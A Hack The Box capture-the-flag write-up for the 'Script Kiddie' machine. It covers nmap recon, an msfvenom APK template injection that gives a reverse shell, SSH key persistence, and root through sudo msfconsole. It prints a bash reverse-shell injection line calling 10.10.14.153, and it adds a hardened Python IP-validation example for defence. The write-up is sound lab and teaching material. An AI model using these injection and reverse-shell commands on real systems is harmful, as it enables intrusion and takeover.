Script Kiddie ~ Hack The Box

CTFs Feb 11, 2021


Prerequisite

Just to make life easier, I usually add an entry to my hosts file so the target machine is easier to reach.

echo "10.129.76.86	scriptkiddie.htb" >> /etc/hosts

Okay now onto the hacking!


Reconnaissance

As always, I started off with an NMAP scan against the machine.

┌──(root💀kali)-[/home/…/boxes/htb/machines/scriptkiddie]
└─#  nmap -Pn -sC -sV -A -p- -oN initial scriptkiddie.htb
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-10 09:26 EST
Nmap scan report for scriptkiddie.htb (10.129.76.86)
Host is up (0.24s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
|_http-title: k1d'5 h4ck3r t00l5

Scanning & Enumeration

Based on the scan that was run, I realized that port 5000 was running a web server. Thus, I went to investigate and this was what I ended up with!

It's some kind of toolkit running on a Linux-based box that gives the user access to h4ck3r t00l5. My next step was to look at how I could abuse it to gain a reverse shell on the remote machine.

After trying out various methods such as uploading reverse shells and intercepting requests to try and find something interesting, I landed on this.

MSF Venom had a vulnerability that allowed command injection when an APK template was supplied to generate a payload. This site did allow me to generate my own payload using MSF Venom.

Exploitation

Upon finding this exploit, I fired up MSF console to generate an APK template to upload and gain a reverse shell on the target box. [Link to MSF Module]

After that, I uploaded the APK "template file" in the site's payload section and opened a Netcat listener on my end to catch any incoming shells.

Once I hit the generate button, my listener caught a reverse shell from the remote machine, which I then stabilized with the following Python one-liner:

python3 -c 'import pty; pty.spawn("/bin/bash")'

Maintaining Access

Since I discovered that SSH was running on the server, I generated a new pair of SSH keys and placed the public key on the remote machine!

This allowed me to then SSH into the machine as the kid user without any password authentication.

Interactive Shell + User Flag~!

Privilege Escalation [Level 1]

Looking around the FS, I realized that there was another user named pwn and in the user's home directory lived a shell script.

This shell script seemed to read IPs from a file in kid's home directory (the user I currently owned) and run an NMAP scan against them. The script was also owned by the pwn user.

My theory was to append an entry to that file which would break out of the NMAP command and run bash, giving me a reverse shell as the pwn user!

[email protected]:~/logs$ echo "NEEPOC  ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.153/9876 0>&1' #" >> hackers

And I was able to gain a shell! I then proceeded to do the same thing with the SSH keys and stabilize my shell.
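The root cause in this step is a scanner that feeds lines from a writable file into a shell command string. Below is a hardened version of that pattern, added here as an example and not the box's own script: whole-line IP validation plus an argv list for nmap, so file contents can never be interpreted by a shell. The flags, function names and sample file are my own assumptions.

```python
"""Hardened version of the IP-scanning helper pattern from this section.

Added example, not the box's own script. The flaw described above is that a
line from the targets file lands inside a shell command string, so shell
metacharacters in the file become commands. The fix: accept a line only if
the whole line parses as an IP address, and hand the accepted addresses to
nmap as separate argv entries with no shell involved.
"""
import ipaddress
import subprocess
from typing import List, Tuple

# Constructed sample targets file: one valid entry and one injection attempt
# of the kind the page describes (harmless here, it is only text).
SAMPLE = "10.0.0.5\n10.0.0.6 ; id #\n"


def parse_targets(text: str) -> Tuple[List[str], List[str]]:
    """Split file contents into (accepted, rejected) lines. Anything that is
    not exactly one address (extra tokens, metacharacters, hostnames) is
    rejected instead of being interpolated into a command."""
    accepted, rejected = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        try:
            accepted.append(str(ipaddress.ip_address(line)))
        except ValueError:
            rejected.append(raw)
    return accepted, rejected


def build_nmap_argv(targets: List[str]) -> List[str]:
    """Each target is its own argv element; the flags are an assumed choice."""
    return ["nmap", "-sn", *targets]


def scan_from_file(path: str, run=subprocess.run) -> Tuple[List[str], List[str]]:
    """Scan only validated addresses and return what was dropped, so an
    operator can see tampering with the file instead of executing it."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        accepted, rejected = parse_targets(fh.read())
    if accepted:
        run(build_nmap_argv(accepted), check=False)  # argv list, never shell=True
    return accepted, rejected
```

Logging the rejected lines (rather than silently dropping them) also gives a cheap detection signal: a targets file that suddenly contains shell metacharacters is worth an alert.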


Privilege Escalation [Level 2]

Lastly, the path to root on the machine was pretty straightforward. I first ran sudo -l to figure out which binaries I was able to run as root.

This revealed that I was able to run MSF Console with root privileges without a password. So I abused this and invoked /bin/bash from inside MSF Console running as root.

And that's it, I was able to root this box!
